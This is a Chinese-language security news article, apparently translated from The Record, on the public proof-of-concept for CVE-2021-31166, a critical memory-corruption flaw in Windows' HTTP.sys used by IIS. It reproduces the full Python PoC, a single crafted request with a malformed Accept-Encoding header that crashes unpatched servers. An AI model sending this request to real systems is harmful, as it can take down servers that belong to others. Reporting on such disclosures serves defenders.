Windows操作系統(tǒng)HTTP協(xié)議棧內(nèi)存破壞漏洞PoC公開
5月微軟補(bǔ)丁日修復(fù)了一個(gè)CVSSv3評(píng)分9.8分的嚴(yán)重安全漏洞,該漏洞CVE編號(hào)為CVE-2021-31166。近日,有研究人員在GitHub上公布了該漏洞的PoC代碼。
CVE-2021-31166漏洞是Windows操作系統(tǒng)中HTTP 協(xié)議棧的內(nèi)存破壞漏洞。該協(xié)議棧是Windows內(nèi)置的IIS 服務(wù)器使用的。如果IIS 服務(wù)器啟用,攻擊者就可以發(fā)送偽造的包來(lái)在操作系統(tǒng)kernel上執(zhí)行也代碼。微軟稱該漏洞可以被用來(lái)創(chuàng)建網(wǎng)絡(luò)蠕蟲,因此建議優(yōu)先修復(fù)。
雖然該漏洞CVSS評(píng)分為9.8分,聽起來(lái)非常危險(xiǎn),但該漏洞只影響最新的一些Windows版本,具體影響Windows 10、Windows server 2004、Windows server 20H2的不同版本。
5月17日,安全研究人員Axel Souchet在GitHub上公開了該漏洞的PoC代碼。該P(yáng)oC代碼可以使運(yùn)行IIS 服務(wù)器的未修復(fù)的Windows系統(tǒng)奔潰,但是并沒(méi)有實(shí)現(xiàn)蠕蟲功能。
PoC代碼參見:https://github.com/0vercl0k/CVE-2021-31166
- import requests
- import argparse
- def main():
- parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')
- parser.add_argument('--target', required = True)
- args = parser.parse_args()
- r = requests.get(f'http://{args.target}/', headers = {
- 'Accept-Encoding': 'doar-e, ftw, imo, ,',
- })
- print(r)
PoC視頻參見: https://github.com/0vercl0k/CVE-2021-31166/blob/main/pics/trigger.gif
本文翻譯自:https://therecord.media/poc-released-for-wormable-windows-iis-bug/如若轉(zhuǎn)載,請(qǐng)注明原文地址。